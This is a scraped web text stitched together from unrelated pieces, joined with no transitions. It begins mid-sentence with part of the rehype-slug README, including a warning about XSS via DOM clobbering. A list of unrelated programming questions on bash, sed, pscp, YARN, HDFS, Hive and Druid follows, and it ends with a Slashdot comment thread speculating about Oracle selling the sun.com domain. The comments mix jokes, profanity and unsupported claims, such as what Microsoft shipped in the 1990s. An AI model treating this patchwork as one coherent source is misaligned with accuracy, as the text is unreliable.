ids to headings in the AST.
When should I use this?
This plugin is useful when you have relatively long documents and you want to be able to link to particular sections.
A different plugin,
rehype-autolink-headings, adds links to these headings back to themselves, which is useful as it lets users more easily link to particular sections.
Install
This package is ESM only. In Node.js (version 12.20+, 14.14+, or 16.0+), install with npm:
npm install rehype-slug
import rehypeSlug from ''
In browsers with Skypack:
<script type="module"> import rehypeSlug from '' </script>
Use
Say we have the following file
example.html:
<h1 id=some-id>Lorem ipsum</h1> <h2>Dolor sit amet 😪</h2> <h3>consectetur & adipisicing</h3> <h4>elit</h4> <h5>elit</h5>
And our module
example.js looks as follows:
import {read} from 'to-vfile' import {rehype} from 'rehype' import rehypeSlug from 'rehype-slug' main() async function main() { const file = await rehype() .data('settings', {fragment: true}) .use(rehypeSlug) .process(await read('example.html')) console.log(String(file)) }
Now, running
node example.js yields:
<h1 id="some-id">Lorem ipsum</h1> <h2 id="dolor-sit-amet-">Dolor sit amet 😪</h2> <h3 id="consectetur--adipisicing">consectetur & adipisicing</h3> <h4 id="elit">elit</h4> <h5 id="elit-1">elit</h5>
API
This package exports no identifiers. The default export is
rehypeSlug.
unified().use(rehypeSlug)
Add
ids to headings. There are no options. 1+,
rehype-stringify version 1+,
rehype version 1+, and
unified version 4+.
Security
Use of
rehype-slug can open you up to a cross-site scripting (XSS) attack as it sets
id attributes on headings, which causes what is known as “DOM clobbering”. Please use
rehype-sanitize and see its Example: headings (DOM clobbering) for information on how to properly solve it.
Related
rehype-autolink-headings— add links to headings with IDs back to themselves
Contribute
See
contributing.md in
rehypejs/.github for ways to get started. See
support.md for ways to get help.
This project has a code of conduct. By interacting with this repository, organization, or community you agree to abide by its terms.
|
https://unifiedjs.com/explore/package/rehype-slug/
|
CC-MAIN-2022-05
|
refinedweb
| 467
| 59.8
|
looping through two loops in bash scrip
I am trying to get
partition from first for loop and use it in second loop to get directory but get an error on line 3 near
${partition}
for partition in `hdfs dfs -ls -C /user/constantine/analytics/2018-01-3* | cut -d '/' -f 6 | uniq` do for filename `hdfs dfs -ls -C /user/constantine/analytics/{$partition}` echo $filename)?
- Removing endline character
So I'm trying to read from a fifo-file (a named pipe basically), but when I'm doing a string comparison, using
strcmp()it is not giving expected output.
I tried getting the length of the message using strlen(), and explicitly setting the character as '\0', but still it is not working.
ret_val = read(fd,buff,BUFFSIZE); // where buff is the character array reading from the fd of the fifo-file. // and buffsize has been defined as 32 ret_val = 1; str_len = strlen(buff); buff[str_len] = '\0'; ret_val = strcmp(buff,"bye"); if(!ret_val) { printf("\nProgram is terminating . . ."); }
- Find replace for many strings, still sed?
I am currently facing the following issue. I have accidentally made a naming error for 581 headers of my sequence data. I have created a txt file with in column 1 the wrong names and in column 2 the correct names, so I simply want to "find-replace" using this txt file as input. The location of the wrong header names in the file which I want to edit is not fixed.
Example of the first 3 lines of the "find and replace file":
TRINITY_DN143863_c0_g1_i1:1-201 TRINITY_DN143863_c0_g1_i1 TRINITY_DN224157_c0_g1_i1:1-202 TRINITY_DN224157_c0_g1_i1 TRINITY_DN198969_c0_g1_i1:1-202 TRINITY_DN198969_c0_g1_i1
Ideally I want to search in a file for the name in column one and replace it by the name in the second column. The files where I want to have the names replaced have different structures. Usually if I need to replace a single string I would use sed, would that be possible here also? I have not been able to find a way to get sed to work with an input file. Maybe someone has the solution?
Thanks very much in advance!
- File transfer works ls option does not work for files in pscp
In windows batch file, I am trying pscp with -ls option to list a specific file on the unix server, which is available. But I am getting the error as follows:
d:\temptest>pscp -ls readuser@hostServer:/reports/job_report.dat Listing directory /finreports/EOD/FCBZIM_20190301.zip Unable to open /finreports/EOD/FCBZIM_20190301.zip: no such file or directory
While I understand that it is
Listing Directory, the error message says
no such FILE or directoryIs there a way to list specific files?
However, I am able to list the directory as such.
d:\temptest>pscp -ls readuser@hostServer:/reports/ Listing directory /reports drwxrwxrwx 3 admin staff 256 Feb 14 17:17 . drwxrwxrwx 3 root system 256 Feb 11 17:06 .. drwxrwxrwx 34 admin staff 4096 Feb 14 17:54 JOBS -rw-rw-r-- 1 admin staff 8836162 Feb 14 03:47 job_report.dat
And yes, the file transfer is also successful without any issues.
d:\temptest>pscp readuser@hostServer:/reports/job_report.dat d:\ job_report.dat | 8629 kB | 1078.6 kB/s | ETA: 00:00:00 | 100%
Please help me out in listing specific files.
- Can't kill YARN apps using ResourceManager UI after HDP 3.1.0.0-78 upgrade
I recently upgraded HDP from 2.6.5 to 3.1.0, which runs YARN 3.1.0, and I can no longer kill applications from the YARN ResourceManager UI, using either the old (:8088/cluster/apps) or new (:8088/ui2/index.html#/yarn-apps/apps) version. I can still kill them using the shell in RHEL 7 with yarn app -kill {app-id}
These applications are submitted via Livy. Here is my workflow:
Open the ResourceManagerUI, open the Application, click Settings and choose Kill Application. Notice, the 'Logged in as:' is set to UNKNOWN_USER:
Confirm that I want to kill the Application:
I get the following error in the UI:
Opening the console in Chrome, I see a 401 (Unauthorized) error.
If I try this from the old UI I am able to expand the error message and it shows the following:
{"RemoteException":{"exception":"AuthorizationException","message":"Unable to obtain user name, user not authenticated","javaClassName":"org.apache.hadoop.security.authorize.AuthorizationException"}}
I've read lots of posts, verified and changed several settings to try to fix this with no luck. Here are some of the settings I checked or changed as a result of my research:
hadoop.http.filter.initializers=org.apache.hadoop.security.HttpCrossOriginFilterInitializer,org.apache.hadoop.http.lib.StaticUserWebFilter hbase.security.authentication=simple hbase.security.authorization=false yarn.nodemanager.webapp.cross-origin.enabled=true yarn.resourcemanager.webapp.cross-origin.enabled=true yarn.resourcemanager.webapp.delegation-token-auth-filter.enabled=false yarn.resourcemanager.webapp.ui-actions.enabled=true yarn.timeline-service.http-authentication.simple.anonymous.allowed=true yarn.timeline-service.http-authentication.type=simple yarn.webapp.api-service.enable=true yarn.webapp.ui2.enable=true ranger.add-yarn-authorization=false
Some of these seem way off base to me, like the hbase stuff, since I don't think that has anything to do with what I'm seeing. However, some users, in other situations, had it work for them so I wanted to try it.
Digging through the documentation it seems like you need to be authenticated before you can call the API. However, that same language was in the documentation for 2.6.5, which is the version of YARN I was running before where this worked.
Hopefully someone can point me to documentation that more clearly outlines what I can do to resolve the issue.
Thanks in advance.
- Get the two first files from HDFS
Is there a way to get the two first files from HDFS using command line?. My hadoop version is 2.7.3
I have a folder in HDFS with multiple files, that another application is puting the there: /user/Lab01/inpu/ingestionFile1.json /user/Lab01/inpu/ingestionFile2.json /user/Lab01/inpu/ingestionFile3.json /user/Lab01/inpu/ingestionFile4.json
I need to work just with the first two files based on time, so if list the content using:
$ hdfs dfs -ls -R /user/Lab01/input -rw------- 3 huser dev 668 2019-02-13 11:34 /user/Lab01/inpu/ingestionFile1.json -rw------- 3 huser dev 668 2019-02-13 11:36 /user/Lab01/inpu/ingestionFile2.json -rw------- 3 huser dev 668 2019-02-13 11:38 /user/Lab01/inpu/ingestionFile3.json -rw------- 3 huser dev 668 2019-02-13 11:41 /user/Lab01/inpu/ingestionFile4.json
In order to get the two first files from the directory I simple pip the command using head -2 to get:
$
The normal command to get files from hdfs is using -get:
hdfs dfs -get /user/Lab01/input/fileName
So thats why right now I'm trying to merge this two commands:
$ hdfs dfs -get /user/Lab01/input | hdfs dfs -ls -R /user/Lab01/input | head -2
But I don't get the desire result, I just get a message giving me the output from the last command
- Unable to connect to hive using python using impyla/dbapi.py
I am trying to connect to hive[with default derby db] using python:
from impala.dbapi import connect conn = connect( host='localhost', port=10000) cursor = conn.cursor() cursor.execute('SELECT * FROM employee') print cursor.description # prints the result set's schema results = cursor.fetchall()
but I am getting error:
Traceback (most recent call last): File "hivetest_b.py", line 2, in <module> conn = connect( host='localhost', port=10000) File "/home/ubuntu/.local/lib/python2.7/site-packages/impala/dbapi.py", line 147, in connect auth_mechanism=auth_mechanism) File "/home/ubuntu/.local/lib/python2.7/site-packages/impala/hiveserver2.py", line 758, in connect transport.open() File "/home/ubuntu/.local/lib/python2.7/site-packages/thrift/transport/TTransport.py", line 149, in open return self.__trans.open() File "/home/ubuntu/.local/lib/python2.7/site-packages/thrift/transport/TSocket.py", line 101, in open message=message) thrift.transport.TTransport.TTransportException: Could not connect to localhost:10000
entry in my /etc/hosts am using default hive-site.xml and defult derby database for running my hive. When I run hive through shell it shows me that table:
hive> show databases; OK default test test_db Time taken: 0.937 seconds, Fetched: 3 row(s) hive> show tables; OK employee Time taken: 0.054 seconds, Fetched: 1 row(s) hive> describe employee; OK empname string age int gender string income float department string dept string # Partition Information # col_name data_type comment dept string Time taken: 0.451 seconds, Fetched: 11 row(s)
I am not sure what exactly am I missing here. Any quick references/pointers would be appreciated.
Regards, Bhupesh
- Convert zip file to gzip and write to hdfs
I have a zip file which I want to convert to gzip and write it back to the filesystem. How can I do this?
I already have this code to compress a file to gzip:
private static void compressGzipFile(String file, String gzipFile) { try { FileInputStream fis = new FileInputStream(file); FileOutputStream fos = new FileOutputStream(gzipFile); GZIPOutputStream gzipOS = new GZIPOutputStream(fos); byte[] buffer = new byte[1024]; int len; while ((len=fis.read(buffer)) != -1) { gzipOS.write(buffer, 0, len); } // Close resources gzipOS.close(); fos.close(); fis.close(); } catch (IOException e) { e.printStackTrace(); } }
Now I need code to convert the zip file into a gzip file.
- load data from HDFS to Druid in real time
Producer generates a file every minute to HDFS, each file size is nearly 0.5GB,and it should to loaded to druid in 1 min.
Hadoop-based batch ingestion in Druid is supported via a Hadoop-ingestion task.But Map-Reduce task cost much time , how can i load data from hdfs to druid more efficiently?
thx.
- How to make "find" command to recursively list files in symbolic link directories?
I've got a directory named a, which has 3 sub-directories, 2 of them are links
ls -lrt a dir_1 dir_2 -> xxx dir_3 -> xxx
Then when I use either "ls -R" or find ./ -name "*" on diretory a, only the files and directories inside "dir_1" are recursively listed, and "dir_2" and "dir_3" only shows top level name of symbolic link. I wish that all files in dir_2 and dir_3 are also recursively listed. How to do this?
Thanks.
- How to list all text files in root and subdirectories using 'ls'
I use this to list all text files in d:\ root:
ls d:\*.txt
This to list all text files in all sub-directories:
ls d:\*\*.txt
How can I list all text files in the root AND in all sub-directories using
ls?
This doesn't work:
ls d:/{,**/}*.txt
edit: in
lsnot in
find,
grep,
awk,
sedor whatever other search command
- using "ls" and preserving the spaces in the resulting array
I am trying to read a directory with "ls" and do operations on it
directory example:
$ ls -1 x x y y z z
script file: myScript.sh
#!/bin/bash files=(`ls -1`); for ((i=0; i<"${#files[@]}"; i+=1 )); do echo "${files[$i]}" done
however, the output is
$ myScript.sh x x y y z z
yet if I define "files" in the following way
$ files=("x x" "y y" "z z") $ for ((i=0; i<"${#files[@]}"; i+=1 )); do echo "${files[$i]}"; done x x y y z z
How can I preserve the spaces in "files=(`ls -1`)"?
|
http://quabr.com/52767930/looping-through-two-loops-in-bash-scrip
|
CC-MAIN-2019-09
|
refinedweb
| 1,926
| 54.93
|
j: Next unread message
k: Previous unread message
j a: Jump to all threads
j l: Jump to MailingList overview
On 3/31/2018 2:14 PM, Marius Räsener wrote:
Oh, ok... yeah didn‘t think of that. Except I guess I‘d assume that so far multiline strings are either with textwrap or ‚don‘t care‘? Maybe?
For docstrings, I don't care, as a docstring consumer like help() can reformat the docstring with indents and dedents. For instance
def f(): def g(): """returnx
more doc """ print( g.__doc__) help(g)
f() returnx
more doc
Help on function g in module __main__:
g() returnx
more doc
For other situations, parse-time string concatenation often suffices, as I showed in my response to the original post. This example from idlelib.config shows the increased flexibility it allows. It has 1-line padding above and 1-space padding to the left to look better when displayed in a popup box.
warning = ('\n Warning: config.py - IdleConf.GetOption -\n' ' problem retrieving configuration option %r\n' ' from section %r.\n' ' returning default value: %r' % (option, section, default))
With no padding, I would not argue with someone who prefers textwrap.dedent, but dedent cannot add the leading space.
For literals with really long lines, where the physical indent would push line lengths over 80, I remove physical indents.
class TestClass(unittest.TestCase): \ test_outputter(self): expected = '''\ First line of a really, really, ............................, long line. Short line. Summary line that utilizes most of the room alloted, with no waste. ''' self.assertEqual(outputter('test'), expected)
-- Terry Jan Reedy
|
https://mail.python.org/archives/list/python-ideas@python.org/message/MDA6Y2LIYR3W7Z2CCHORDJBBRHRREPP5/
|
CC-MAIN-2019-47
|
refinedweb
| 261
| 65.83
|
Button is pressed on startup of tag plugin[SOLVED]
On 08/10/2014 at 09:21, xxxxxxxx wrote:
Hi, I created a little plugin with a few parameters and a button.
I want to do stuff as a reaction on button clicks, but when I start the plugin, the button gets executed allready once. How can I avoid this?
This is my code for the button:
def Execute(self, tag, doc, op, bt, priority, flags) :
data = tag.GetDataInstance()
if MYBUTTON:
print "The button is pressed"
return True
On 08/10/2014 at 10:57, xxxxxxxx wrote:
add this function:
def GetMessageID(data) : #This custom method is used to get the id of your gizmos
if data is None:
return
try:
return data["id"][0].id
except:
return
and add this to the Message:
def Message(self, op, type, data) :
id = GetMessageID(data) # calls to the custom GetMessage() method
if id == MYBUTTON:
print "The button is pressed"
Thanks to Scott on this forum for teaching me it.
On 09/10/2014 at 02:39, xxxxxxxx wrote:
Thanks for the answer!!
I didn't need to add the GetMessageID though. Fixed it with:
def Message(self, node, type, data) :
if type == c4d.MSG_DESCRIPTION_COMMAND:
if data['id'][0].id == MOMBUTTON:
print "The button is pressed"
return True
On 09/10/2014 at 02:47, xxxxxxxx wrote:
casimir your solution is much cleaner. That's exactly how you should do it
On 09/10/2014 at 13:08, xxxxxxxx wrote:
Thanks NiklasR!! Your words give me a boost to continue delving into it, harder than ever :D
|
https://plugincafe.maxon.net/topic/8202/10688_button-is-pressed-on-startup-of-tag-pluginsolved
|
CC-MAIN-2020-40
|
refinedweb
| 263
| 70.33
|
good first step would be understanding how the other entry works: > > cartProd :: [a] -> [b] -> [(a,b)] > cartProd xs ys = do > x <- xs > y <- ys > return (x,y) > > It is about halfway between the two choices. > > John > > On Thu, Feb 9, 2012 at 9:37 AM, readams <richard.adams at lvvwd.com> wrote: >> Nice explanation. However, at >> it was >> pointed out that this >> >> cartProd :: [a] -> [b] -> [(a, b)] >> cartProd = liftM2 (,) >> >> is equivalent to the cartesian product produced using a list comprehension: >> >> cartProd xs ys = [(x,y) | x <- xs, y <- ys] >> >> I do not see how your method of explanation can be used to explain >> this equivalence? Nevertheless, can you help me to understand how >> liftM2 (,) achieves the cartesian product? For example, >> >> Prelude Control.Monad.Reader> liftM2 (,) [1,2] [3,4,5] >> [(1,3),(1,4),(1,5),(2,3),(2,4),(2,5)] >> >> Thank you! >> >> -- >> View this message in context: >> >> 49p5470185.html Sent from the Haskell - Haskell-Cafe mailing list >> archive at Nabble.com. >> >> _______________________________________________ >> Haskell-Cafe mailing list >> Haskell-Cafe at haskell.org >> > > _______________________________________________ > Haskell-Cafe mailing list > Haskell-Cafe at haskell.org >
|
http://www.haskell.org/pipermail/haskell-cafe/2012-February/099384.html
|
CC-MAIN-2014-23
|
refinedweb
| 183
| 75.5
|
Oracle Could Reap $1 Million For Sun.com Domain 183
joabj writes "Last week, Oracle announced that it is decommissioning the Sun.com site, which it acquired as part of the $7 billion purchase of Sun Microsystems. So what will Oracle do with the domain name, which is the 12th oldest .com site on the Internet? Domain brokers speculate Oracle could sell it for $1 million or more, if it chose to do so."
Sell it to the King of France (Score:1)
The Sun King will pay big bucks
Re: (Score:2)
Re: (Score:2)
And France hasn't had a king at all for more than 150 years...
Are saying the Burger King isn't a real king?
Royal with Cheese baby!
Re: (Score:2)
Re: (Score:2)
I'm wondering, are all the people ruining the jokes in this thread French?
Oui
Re: (Score:2)
Probably not ; they're probably people from a culture that is generally proud of not needing to travel to meet foreign influences in different parts of the world (at least, not until they've been sanitised down to their own domestic standards).
Possibly they're even people who have, in living memory, had a head of state who has never felt the need to get a passport to travel the world on his own behalf.
Some such people seem to have be
Re: (Score:2)
One million? Really? (Score:2)
Dr. Evil: Here's the plan. We get the warhead, and we hold the world ransomed for.....One MILLION DOLLARS!!
No.2: Ahem...well, don't you think we should maybe ask for *more* than a million dollars? I mean, a million dollars isn't exactly a lot of money these days. Virtucon alone makes over nine billion dollars a year!
Dr. Evil: Really?
No.2: Mm-hmm.
Dr. Evil: That's a number. Okay then. We hold the world ransom for.....One hundred..BILLION DOLLARS!!
Many domains are worth more. (Score:3)
I just don't see them selling it off right now. It isn't like Larry is broke and needs the bucks. And it isn't like the market for domain names is at a high point. He would get more selling the Sun name, domain, and some minor IP to someone as a set. He has already carved all the white meat off that turkey, which is the customer base and some software.
Re: (Score:3)
They wanna make sure it (the domain) doesn't come back. They wanna make sure those pesky hippies with their open-source sandals and well-engineered hemp shirts go somewhere else, somewhere that is NOT ORACLE. Because to have the PRIVILEGE of being served by an Oracle web server, you should be wearing an Armani suit, a silk tie and matching pointy italian shoes.
Re: (Score:2)
Hah! Dead on there.
As one of those pesky hippies who works for a company that owns about 1500 Sun servers, allow me to say that Larry can go fuck himself. When they increased our support contract to $8M/year, we told them to take a hike. We are replacing all of our Sun software, most of our Solaris instances, and much of our Sun hardware in less than two years.
I mourn Sun, but they're dead now. Nobody is going to pay more than pocket change for the sun.com domain. Filthy dirty fucking Oracle.
Re: (Score:2)
The Chicago Sun. The U.K. paper "The Sun", etc. There are plenty of companies who would want it and would pay more than pocket change, although the economy won't support a premium price right now.
Maybe Oracle can make it one of those cheesy ad farms, complete with Google ads on both sides, top and bottom, complete with BizRate ads "Looking for a great price on sun?"
Re: (Score:2)
Re: (Score:3).
So would this be worth more to Oracle in terms of marketing than the sale price of the domain.
Re: (Score:2)
Re: (Score:2).
"Nah!"
- Theodoric of York
Re: (Score:2)
Donate, or sell it, either way this would be the best possible place for it.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
It isn't about ease of use, it is about clout. Why would the Coca-Cola company care about coke.com? Clout. The big with the shortest domain name has the biggest penis, after all.
Re:Many domains are worth more. (Score:5, Funny)
I find your ideas interesting and would like to subscribe to your newsletter.
Re: (Score:2)
I find your ideas interesting and would like to subscribe to your newsletter.
I personally find it a bit like gas mask porn. I'm glad it's out there; I believe in the freedom of speech; I really hope the users are happy and fully satisfied. However, I have no personal need to ever see this particular newsletter.
Just saying. (BTW; I once heard that the gas mask fetish was really popular in the UK in the 50s & 60s following on from the long nights of the london blitz; can't find a citation though).
Solaris replacement (Score:3)
Would you mind telling us what you're replacing it with? RHEL, Ubuntu Server, *BSD, other?
And how have you replicated those nice Solaris features (containers, that debugging thing, the new copy-on-write filesystem), or if they are missed at all?
Re: (Score:3)
Migration in general is going to RHEL. It's been my experience that containers just never caught on in the enterprise world. (I run 'em at home, we've got a few in our lab, but they were stillborn for us and most other companies I talk to.) Dtrace is very handy once in a long while, but only when things go wrong--which they shouldn't.
And that leaves zfs. Rumour has it that RedHat is going to be releasing an incompatibly-licensed ZFS to their customers. I hope it's true, because it is the single greatest ste
Re: (Score:2)
Rupert Murdoch might want to buy it to go with [nsfw], the top selling "newspaper" in the English speaking world.
Re: (Score:2)
i mourn Sun, but they're dead now. Nobody is going to pay more than pocket change for the sun.com domain. Filthy dirty fucking Oracle.
A lot of us feel that way about Oracle and what happened. However i do think the domain name is worth far more than pocket change, regardless of its history.
Re: (Score:2)
So are they going to get rid of "com.sun.java"?
I remember not long ago Oracle changed certain things from Sun to Oracle and broke stuff: [slashdot.org] [computerworlduk.com]
Seems Oracle thinks changing names is more important than getting technical stuff working right.
FWIW I recently had problems after updating "Oracle Virtualbox" so much so I had to go back to an older versio
Re: (Score:2)
It doesn't have to be used for computers. If they don't want a competitor to get it, they can sell it to something completely different. It would be a great domain for astronomers or ham radio operators to store their sun spot data, or maybe sun worshipers can use it as a holy site. Is Sun Ra still around?
Re: (Score:2)
Caldera might be interested. They shat all over SCO, why not do the same to Sun?
Re: (Score:3)
The domain on its own is worth hardly anything without the IP. Any party that is serious about the domain will want no problems with trade marks or IP claims against the use of the domain. Now I hardly think that is going for only a million dollars.
Of course, a business that had nothing to do with computers, software, databases, etc. might not have to worry about trade mark claims as their business might not constitute dilution of the mark (as in the case of Mr. Nissan with Nissan Computers), but I seriou
Re: (Score:3)
The internet is full of links to sun.com from all sorts of web pages that will never be removed. Anyone who owns the domain gets literally millions of link referrals for free.
Re: (Score:2)
The internet is full of links to sun.com from all sorts of web pages that will never be removed. Anyone who owns the domain gets literally millions of link referrals for free.
Invalidation of those links would hurt people who have purchased Sun's products....
In many cases, those would be links to documentation, downloads, help references, etc.
Re: (Score:2)
Re: (Score:2)
While I can't think of an application for the domain (except the newspapers I mentioned earlier) it wouldn't be unheard of for another company to change their name to Sun, if they can get the domain and trademarks. Perhaps Levono or some other computer company that is large but not recognizable enough or wants the "street cred" to take it to the next level. Asus, Gigabyte, Biostar etc.
Maybe AMD will buy it to start a computer company of their own, to be more direct (thus more competitive) in the server ma
NBA (Score:3)
Re: (Score:1)
Not the way they've been playing of late. They should go back to "run and gun" instead of trying to be a half-court team for the post-season. Fuck the post-season. It was more fun when they scorched everyone in the regular season. That's Nash's real skill.
Sink Question (Score:2)
Re: (Score:2)
Suns.com, not Sun.com (Score:2)
Suns already have suns.com. Sun.com doesn't make any sense. Look at laker.com, celtic.com, etc. NBA teams don't own those.
wasnt this the cause of the .com bubble (Score:1)
Re: (Score:2)
Even if no one cares about Sun Microsystems, or has a paper named The Sun, or some other existing product or service with "sun" in it, its still a three letter
.com domain. That is worth mucho dinero. And then massive extra credit points for being a common English word.
If there isn't a site already for the domain, someone will create or rename their site "Sun (\S+)" just for the domain. No one is going to forget a web site called.
If I thought that Slashdot had the money to do it, I imagine th
I must have this site...but first... (Score:4, Funny)
What's the IP Address of the Sun?
Re: (Score:3)
use broadcast, 255.255.255.255
even with that mask, you're still visible under the sun.
Re: (Score:2)
0.0.0.1
Hmmm (Score:2)
Re: (Score:2)
Re: (Score:2)
Larry should....
Larry: Release the hounds!
Re: (Score:2)
Re: (Score:2)
And yet pizza.com sold a couple of years ago for $2.6million. I know the economy was in better shape then, but it was still a 'legitimate' sale, not some crazy bubble start up in 1998.
I don't understand it either, if I'm honest, but we all know that what something is worth is whatever someone will pay for it, and apparently generic domains really are worth a bit.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Feeling a tad smug (Score:2)
I remember working in the IT department of a fair-sized company back in '99 and it was a dedicated Sun shop, in fact my boss denigrated Linux and open-source software (of course he called it freeware) any chance he could. He talked like Sun would be around forever...oops.
Oldest dotcoms (Score:2)
Interesting that Microsoft, established in 1975, doesn't appear on the list of the 100 oldest dotcom registrations. Xerox registered before IBM. Boeing before Adobe. And Microsoft isn't on the list. Did they not recognise the long-term importance of the internet?
Re: (Score:1)
No. Bill Gates' first book, "The Road Ahead" published in 1995, famously did not refer to the Internet. The much-hyped Windows 95 OS was released without a web browser (that apparently wasn't a coincidence, Jim Clark and the Netscape crew carefully timed the release of Navigator). But MS made up for lost time. They quickly struck a deal with a small company called Spyglass for rights to their browser, which became IE. They made sure that IE was a "integral" part of Windows that couldn't be de-installed,
Re: (Score:2)
Microsoft did not have TCP/IP support until well into the '90's instead attempting to 'standardize' their NetBIOS and trying to win people over with cartoon-like chat programs and 'channels' or 'folders' instead of websites into their own Microsoft Network (MSN) which was not connected to the Internet. Thankfully the industry ignored them and MS has since been trailing in the adoption of the proper Internet in general.
Re: (Score:2)
Microsoft did not have TCP/IP support until well into the '90's
Winsock.dll was part of the standard win3.1 install. It's just that MS didn't adevrtise it, same way as the standard C/C++ libraries come bundled with today's visual studio but MS documentation points the reader towards
.net and C#.
Re: (Score:2)
Try again. You may have gotten Trumpet Winsock as part of your OEM install, but it was *not* part of the Microsoft standard install. Microsoft did not have a generally available TCP/IP stack shipped standard until Windows 95.
Re: (Score:2)
Re: (Score:3)
Bill Gates and the CD-ROM revolution (Score:3)
Bill Gates's book "The Road Ahead", is, in its first 1995 edition, focused on how the CD-ROM was going to change everything about computers. Remember Encarta? They were really focused on that -- multimedia on discs, that was going to be the future.
But then, for the 1996 printing, the whole thing was re-written and suddenly CD-ROMs weren't the hot thing. It was all about the Internet.
Re: (Score:2)
Ya, encyclopedias on CD were "the future"... in 1990.
My school had a Mac with a CD-ROM, and a copy of the Grolier (I think) encyclopedia. It was the most amazing thing at the time.
Re: (Score:2)
and suddenly CD-ROMs weren't the hot thing
I used to have a clipping on my cubicle wall from a Time magazine in 1995 where Bill Gates was dismissing the Internet as a fad. Despite the book's change, Microsoft never really 'got' the Internet. Sure, they had some de-facto monopoly power in it, with IE6 and such, but every strategy was how to wrap Windows in the Internet.
It was then that a couple guys were getting fed up with Altavista (OK, we all were, but they decided to do something better).
Re: (Score:1)
Interesting that Microsoft, established in 1975, doesn't appear on the list of the 100 oldest dotcom registrations. Xerox registered before IBM. Boeing before Adobe.
Of course Boeing registered early. Do you know a major focus of why the Internet was intended? As a communication system in the event of nuclear war. That's why it was sponsored by DARPA. And so a major defense contractor like Boeing got involved because well, government money!
Besides, Microsoft was not huge in 1975, or for years afterward. The idea that it was formed like Athena from the brow of Zeus is not true.
And Microsoft isn't on the list. Did they not recognise the long-term importance of the internet?
It took over 2 decades for the internet to reach any kind of building importance even in
Re: (Score:2)
Back in the day, if you asked someone what their email address is, you'd get various takes on a blank/concerned/weirded out stare. So, yeah, Internet was available, but by no means mainstream.
Re: (Score:2)
I'll be completely honest, I thought the Internet would be a fad.
Then one day all of the terminals in the library, that were setup for DISCUS, were taken except this one ratty looking box in the corner. Gopher? Veronica? OK. Man, I was hooked and felt like a complete ass for dismissing friends who had only a few years earlier been doing the BBS thing as wasting their time with a rich kid's toy that no one would be interested in.
Re: (Score:2)
Re: (Score:2)
Well, no, they didn't. Until it got forced down his throat, Bill G. was convinced that the Internet was a sideshow. You were going to do all your networking on Microsoft proprietary nets, you see.
Whoopee! (Score:5, Funny)
Re: (Score:2)
At $47500 per CPU, you're looking at way more than a million before you reach 32 cores.
Forget the domain, ask about the IP blocks (Score:3)
As the TLDs expand, the value of a ".com", even a sexy three letter one with some history decreases.
Ask instead which (pre CIDR) address block(s) Sun had and Larry E now has. IIRC, they're sitting on at least one "A" and potentially multiple "B"s.
Since "IPv4" is gonna implode this year (yeah, right, but just go with it.....), the IP space is gonna have much more real value.
Red
Re: (Score:2)
As the TLDs expand, the value of a ".com", even a sexy three letter one with some history decreases.
I agree with you on the IP addresses, but how much of your browsing is really done on sites with extensions other than
.com or your local ccTLD? There are some occasional exceptions, of course - I'm aware we're posting on a .org, for instance, and bit.ly springs to mind - but when was the last time you saw a legitimate site on a .biz or .info name? Even if the alternate domains do eventually gain a bit more acceptance, decent sounding .com names will have the cachet that comes with exclusivity; more so, if
Re: (Score:2)
It can be used as a verb or a noun, with one of the accepted definitions of the latter being a synonym for alternative [reference.com].
Re: (Score:2)
The Ip6 address space is exponentially bigger than IPv4 (obviously) but any successful domains in a separated Internet would only have to "better"(in a capitalist sense, which assumes you can buy IPs) than one of the 2^12-1, addresses.
How often do you type IPs? Domain names get x^
Re: (Score:2)
Agree that IPv4 is gonna happen and that transition to v6 is inevitable, timing uncertain.
Post transition, there will be (by design) no address shortage and legacy v4 addresses might have some sentimental value, but will really just be part of the larger space.
How smoothly transition goes, i.e., how much of the IP world gets stuck in v4 land because their OS or software vendor didn't update their stacks or applications to support v6 will also greatly influence the value of v4 space DURING transition.
Immedia
Why should they? (Score:2)
I am sure, they keep it as a redirect. for sure in-links are mentioned in old documentation, for which customers may hold the new owner responsible (in the sense of the next buying decision). It makes a very bad impression if you follow a support instruction and end up on a webpage which does not exist (or worse: was sold and re-sold to a porn company).
Re: (Score:2)
... It makes a very bad impression if you follow a support instruction and end up on a webpage which does not exist
...
Never mind, it is common on oracle.com anyway.
Jave EE XML Descriptors (Score:2)
If the domain changes hands, that's going to break a lot of XML files containing xsi:schemaLocation attributes and DTD references pointing to documents within [sun.com] .
It wiould probably be cheaper... (Score:2)
What about the trademark? (Score:2)
I assume the domain name is useless as long as Oracle owns the trademark to "Sun".
angel'o'sphere
Really not that simple... (Score:2)
Destroying the brand? (Score:2)
Re: (Score:2)
Larry WANTS to destroy the brand.
There's little doubt this is irrational control-freakery from the largest shareholder.
They won't sell (Score:2)
Reason: redirects.
Thread over, move along.
PS: And they don't need the money, want to keep the namespace of Java functions etc etc etc etc etc. Why did this make frontpage?
I'm not sure they'd sell it... (Score:2)
They may be decommissioning it, but that doesn't mean they're going to sell it. There are plenty of domains held by companies which they just hold for the purpose of making sure they have the domains matching their trademarks.
I'm not sure what the point in decommissioning it is, tbh. They may as well just make it point to the root Oracle homepage and forget about it.
Re:Re (Score:5, Funny)
Oracle.xxx would actually make a lot of sense. Considering that their prices and policies are so obscene.
Re: (Score:2)
There's a limit to how much material you can admit to being obscene before the tabloids get interested.
Re: (Score:1)
So if they sold the domain but kept the rights to the Sun name as a trademark, then how could anyone open up a new Sun.com without being in danger of violating Oracle's trademark? People have been sued over their domains named after themselves when it has the same name as a trademark, even when their domain has nothing to do with whatever area the trademark is in.
If the company operates in an entirely different area from Sun Microsystems, such that no confusion could arise, or if Oracle abandons the Sun trademark, which they probably would be if they sold Sun.com, then there's no problem.
WRT lawsuits, the CIA has also been sued for mind control. You can sue for anything; winning is the hard part.
Re: (Score:1)
semi o/t, but this site might interest you [nissan.com]
The gent has the same last name as a big car company. Sort of bad luck for him. He still has his domain, but out of pocket for lawyers...
Re: (Score:2)
Yeah, but being sued is both time consuming and expensive.
Re: (Score:2)
Duh! That's how Oracle intends to make the really big bucks.
Re:Worth more to keep it (Score:5, Informative)
Re: (Score:2)
Re: (Score:2)
There is probably tons of software that points at sun.com, automatically downloading software...
Oh God, it's like a black hat's wet dream. Thousands of machines requesting binaries from your server every second and then blinding running them.
On a more seriously note, sun.com is already gone, but my Java updates are still working fine, so I'd assume their update server isn't located at sun.com. Not to mention Java updates are probably cryptographically signed.
There's LOTS more than web servers on a domain. (Score:2)
There is probably tons of software that points at sun.com, automatically downloading software, docs, etc.
